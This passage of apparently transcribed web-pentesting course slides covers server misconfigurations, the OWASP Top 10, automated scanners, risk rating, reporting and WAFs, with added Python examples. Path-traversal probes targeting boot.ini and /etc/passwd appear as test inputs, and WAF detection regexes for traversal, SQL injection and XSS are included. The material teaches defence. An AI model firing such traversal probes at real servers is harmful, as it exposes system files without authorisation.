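    for requested in ("logo.jpg", "..\\..\\boot.ini", "%2e%2e/%2e%2e/etc/passwd"):
        print(requested, blacklist_allows(requested), read_image(requested))
```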

Page 77: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 78: Pentesting web applications

Server Configuration Issues

- Directory listings
- Source code disclosure
- Documents
- Caching
- WebDAV methods
- Backup files accessible
- Debug functionality
- Displaying stack traces to the user

Page 79: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 80: Pentesting web applications

Attacking Web Server

Popular web servers: Microsoft IIS, Apache, IBM WebSphere, Oracle WebLogic, Apache Tomcat, JBoss

- Unpatched software
- Test scripts
- Denial of service attacks
- Buffer overflow attacks
- Server extensions

Page 81: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 82: Pentesting web applications

OWASP Top 10
- A1: Injection
- A2: Cross-Site Scripting (XSS)
- A3: Broken Authentication and Session Management
- A4: Insecure Direct Object References
- A5: Cross-Site Request Forgery (CSRF)
- A6: Security Misconfiguration
- A7: Insecure Cryptographic Storage
- A8: Failure to Restrict URL Access
- A9: Insufficient Transport Layer Protection
- A10: Unvalidated Redirects and Forwards


Page 84: Pentesting web applications

Automated Tools
Tools automate the 'attack' on the web server/database server: they send protocol-specific requests to the server to test for common vulnerabilities.
How do they work? Signature based.
Phases: Crawl, Audit (attack), Report
Tools: AppScan (IBM), WebInspect (HP), Acunetix, Vega, ...

Page 85: Pentesting web applications

Automated Tools
Good at:
- Testing for hundreds of common vulnerabilities and misconfigurations that are impractical to test for manually
- Regression testing of servers to ensure they stay secure, especially after activities like patching or new code deployment
- Scheduling automated scanning/testing for off-production hours to avoid conflicts
Not good at:
- Automated tools are most effective at 'guessing' and using known signatures to identify issues
- Most applications are custom developed and complex in nature
- Detailed exploits that require intelligent feedback and analysis
- Cannot find business logic bugs

Page 86: Pentesting web applications

Automated Tools
Problems:
- Testing can adversely impact the system being scanned (e.g. filling the database)
- Performance issues and crashes can happen
- The most rigorous testing usually requires special planning and may overload log files, set off IDS sensors and leave 'junk' application data
- False positives and false negatives


Page 88: Pentesting web applications

Risk Assessment
Why risk assessment? To prioritize tasks.
Likelihood: probability of the attack happening
- Ease of discovery
- Ease of exploit
Impact: effect of the attack
- Loss of confidentiality, business damage, financial damage
Total Risk = Likelihood * Impact
CVE standard
https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology
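
The formula on this slide, carried through in code as an added example (not from the deck). It follows the OWASP Risk Rating Methodology page linked above: each likelihood factor (ease of discovery, ease of exploit and the other threat-agent and vulnerability factors) and each impact factor is scored 0 to 9, the two groups are averaged, each average is banded LOW/MEDIUM/HIGH, and the two bands are combined in the severity matrix. The factor names follow that page; the scores for the sample finding are constructed.

```python
"""OWASP Risk Rating worked in code: average the 0-9 likelihood factors,
average the impact factors, band each as LOW/MEDIUM/HIGH and combine them in
the severity matrix.

Added example, not from the deck.  The bands (0 to <3 LOW, 3 to <6 MEDIUM,
6 to 9 HIGH) and the matrix follow the OWASP Risk Rating Methodology page the
slide links to; the factor names match that page and the scores for the
sample finding are constructed.
"""
from statistics import mean
from typing import Dict


def band(score: float) -> str:
    """Map a 0-9 average onto the OWASP likelihood/impact bands."""
    if not 0 <= score <= 9:
        raise ValueError(f"score {score} outside the 0-9 scale")
    if score < 3:
        return "LOW"
    if score < 6:
        return "MEDIUM"
    return "HIGH"


# Overall severity, keyed by (likelihood band, impact band)
SEVERITY = {
    ("LOW", "LOW"): "Note",      ("LOW", "MEDIUM"): "Low",       ("LOW", "HIGH"): "Medium",
    ("MEDIUM", "LOW"): "Low",    ("MEDIUM", "MEDIUM"): "Medium", ("MEDIUM", "HIGH"): "High",
    ("HIGH", "LOW"): "Medium",   ("HIGH", "MEDIUM"): "High",     ("HIGH", "HIGH"): "Critical",
}


def rate(likelihood: Dict[str, int], impact: Dict[str, int]) -> Dict[str, object]:
    """Return averages, bands and the overall severity for one finding."""
    for name, value in {**likelihood, **impact}.items():
        if not 0 <= value <= 9:
            raise ValueError(f"factor {name!r} = {value} outside the 0-9 scale")
    l_avg, i_avg = mean(likelihood.values()), mean(impact.values())
    l_band, i_band = band(l_avg), band(i_avg)
    return {"likelihood": l_avg, "impact": i_avg,
            "likelihood_band": l_band, "impact_band": i_band,
            "severity": SEVERITY[(l_band, i_band)]}


# Constructed scores for a hypothetical finding: threat-agent and
# vulnerability factors feed likelihood, technical and business factors
# feed impact.  Higher always means more likely or more damaging.
SAMPLE_LIKELIHOOD = {
    "skill_level": 5, "motive": 4, "opportunity": 7, "size": 6,
    "ease_of_discovery": 7, "ease_of_exploit": 5, "awareness": 6, "intrusion_detection": 8,
}
SAMPLE_IMPACT = {
    "loss_of_confidentiality": 7, "loss_of_integrity": 5,
    "loss_of_availability": 3, "loss_of_accountability": 7,
    "financial_damage": 3, "reputation_damage": 5,
    "non_compliance": 4, "privacy_violation": 5,
}


def run_demo() -> Dict[str, object]:
    return rate(SAMPLE_LIKELIHOOD, SAMPLE_IMPACT)


if __name__ == "__main__":
    result = run_demo()
    print(f"likelihood {result['likelihood']:.2f} ({result['likelihood_band']}), "
          f"impact {result['impact']:.3f} ({result['impact_band']}) "
          f"-> {result['severity']}")
```

With the constructed scores the likelihood averages 6.0 (HIGH) and the impact 4.875 (MEDIUM), which the matrix rates High; note that the matrix is not symmetric in name but is in outcome, so a LOW likelihood with HIGH impact and a HIGH likelihood with LOW impact both land on Medium.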


Page 90: Pentesting web applications

Reports
Documentation world: you must not only be able to do your job, but also provide written proof of how you've done it.
Report: make it understandable to the organization (developers). Mostly PDF format. NDA (Non-Disclosure Agreement).
Contents:
- Who tested it? Details, disclaimers
- Environment details (URLs)
- Summary (graphs)
- Technical details: risk description, reproduction steps, remediations


Page 92: Pentesting web applications

Web Application Firewalls
Web application firewalls block suspicious web requests based on known malicious patterns embedded in the request.
- Check for malicious input values
- Check for modification of read-only parameters
- Block requests or filter out parameters
Can help to protect "old" applications: no source code available, no know-how available, no time available.
No general solution: usefulness depends on the application; not all applications can be protected.
OWASP ESAPI: to filter input
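
The three bullets above, as an added example (not code from the deck or from any WAF product): signature matching on every parameter value, detection of modified read-only parameters by verifying an HMAC the application attached when it emitted them, and the choice between blocking the whole request and filtering out only the offending parameter. The signature patterns are deliberately small, the HMAC key is a constructed demo value, and the parameter names (`item`, `price`, `qty`, `file`, `sig`) are assumptions.

```python
"""Two of the checks the slide attributes to a web application firewall,
signature matching on input values and detection of modified read-only
parameters, plus the block-or-filter decision, run over constructed query
strings.

Added example, not code from the deck or from any WAF product.  The signature
patterns are deliberately small, the HMAC key is a constructed demo value and
the parameter names are assumptions.
"""
import hashlib
import hmac
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlencode

# "Signature based": known malicious patterns looked for in every value
SIGNATURES: List[Tuple[str, re.Pattern]] = [
    ("path traversal", re.compile(r"\.\.[\\/]")),
    ("sql injection", re.compile(r"(?i)'\s*(?:or|and)\s+\S+\s*=|union\s+select")),
    ("cross site scripting", re.compile(r"(?i)<\s*script|javascript:")),
]

# Parameters the application emits but the user must not change; the server
# signs them and the firewall verifies the signature on the way back in
READ_ONLY = ("item", "price")
KEY = b"constructed-demo-key"  # constructed; a real deployment keeps this secret


def sign_read_only(params: Dict[str, str]) -> str:
    """HMAC over the read-only parameters, in a fixed order."""
    msg = urlencode([(k, params[k]) for k in READ_ONLY]).encode()
    return hmac.new(KEY, msg, hashlib.sha256).hexdigest()


def inspect(query: str, mode: str = "block") -> Dict[str, object]:
    """Decide whether a request may pass.

    mode="block" rejects the whole request on any signature hit;
    mode="filter" drops the offending parameters and lets the rest through.
    A modified read-only parameter is always a block.
    """
    params = dict(parse_qsl(query, keep_blank_values=True))
    reasons: List[str] = []

    # Check: modification of read-only parameters
    complete = all(k in params for k in READ_ONLY)
    expected = sign_read_only(params) if complete else ""
    if not complete or not hmac.compare_digest(expected, params.get("sig", "")):
        reasons.append("read-only parameters missing or modified")
    tampered = bool(reasons)

    # Check: malicious input values
    clean: Dict[str, str] = {}
    hits = 0
    for name, value in params.items():
        label = next((lbl for lbl, pat in SIGNATURES if pat.search(value)), None)
        if label is not None:
            hits += 1
            reasons.append(f"{label} in parameter {name!r}")
            if mode == "filter":
                continue  # filter out the parameter instead of blocking
        clean[name] = value

    blocked = tampered or (hits > 0 and mode != "filter")
    return {"allow": not blocked, "reasons": reasons, "params": clean}


def run_demo() -> Dict[str, Dict[str, object]]:
    """Constructed requests: a clean one, a tampered price, and a traversal probe."""
    base = {"item": "book-42", "price": "19.99"}
    sig = sign_read_only(base)
    clean = urlencode({**base, "sig": sig, "qty": "2"})
    tampered = urlencode({**base, "price": "0.01", "sig": sig, "qty": "2"})
    traversal = urlencode({**base, "sig": sig, "file": "../../etc/passwd"})
    return {
        "clean": inspect(clean),
        "tampered": inspect(tampered),
        "traversal_block": inspect(traversal),
        "traversal_filter": inspect(traversal, mode="filter"),
    }


if __name__ == "__main__":
    for name, verdict in run_demo().items():
        print(f"{name:16} allow={verdict['allow']} {verdict['reasons']}")
```

The read-only check is the one that does not depend on signatures at all, which is why it still catches the changed price; the signature list, by contrast, is only as good as its patterns, which is the "no general solution" caveat on the slide.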

Page 93: Pentesting web applications

Advanced Technologies
- Web services
- Flash
- Ajax
- ActiveX controls
- Java signed applets

Page 94: Pentesting web applications

http://www.securitylearn.net